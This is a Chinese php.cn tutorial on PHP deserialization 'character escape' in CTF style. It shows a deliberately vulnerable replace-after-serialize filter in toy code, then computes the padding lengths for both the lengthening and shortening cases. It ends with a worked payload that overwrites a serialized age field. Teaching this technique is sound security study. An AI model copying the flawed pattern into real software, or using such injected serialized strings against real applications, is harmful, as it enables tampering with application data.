本篇文章给大家带来了关于php的相关知识,其中主要介绍了关于反序列化字符逃逸的相关问题,php序列化后的字符串经过替换或修改,导致字符串长度变化,总是先序列化,在进行替换修改操作,下面一起来看一下,希望对大家有帮助。
推荐学习:《PHP视频教程》
本质:闭合
分类:字符变多、字符变少
共同点:
<?php
function filter($string){
$filter = '/p/i';
return preg_replace($filter,'WW',$string);
}
$username = 'purplet';
$age = "10";
$user = array($username,$age);
var_dump(serialize($user));
echo "<pre>";
$r = filter(serialize($user));
var_dump($r);
var_dump(unserialize($r));
?>下面部分可以记作模板,做题时先输出看一下
立即学习“PHP免费学习笔记(深入)”;
var_dump(serialize($user)); # 序列化 echo "<pre>"; $r = filter(serialize($user)); # 替换后序列化 var_dump($r); var_dump(unserialize($r)); # 打印反序列化
可以观察到,每次替换将p改为ww,即每次都多出一个字符
这就导致反序列化时长度分配读取错误而输出错误
所以考虑通过其长度读取的性质来构造字符逃逸
要将10改为20,先确定后面要构造的字符串:
原字符串:";i:1;s:2:"10";} 目标子串:";i:1;s:2:"20";}
确定长度:16(即传入的字符串需要多出16个字符来将这些字符放到下一个属性的位置上去)
每次多1个字符,故需要16个p
故传入:
结果输出:
值过滤,前值包后键与值(左括号为止)
<?php
function filter($string){
$filter = '/pp/i';
return preg_replace($filter,'W',$string);
}
$username = "ppurlet"
$age = "10";
$user = array($username,$age);
var_dump (serialize($user)); # 序列化
echo "<pre>";
$r = filter(serialize($user)); # 替换后序列化
var_dump ($r);
var_dump (unserialize($r)); # 打印反序列
?>与上面代码相似,只是此时是将2个p替换为一个w,字符减少
同样数值不对应会反序列化失败
username:构造逃逸所需代码 age:构造逃逸代码
A后面是传入的age字符串,计算构造长度
即要占位这13个字符
每2个p变1个w,相当于逃逸一位,故输入13*2=26个p,字符长度标识为26,变为13个w,后面13个字符占余下13位
payload:
username='pppppppppppppppppppppppppp' age=A";i:1;s:2:"20";}
推荐学习:《PHP视频教程》
以上就是PHP反序列化详细解析之字符逃逸的详细内容,更多请关注php中文网其它相关文章!
PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
610
收藏
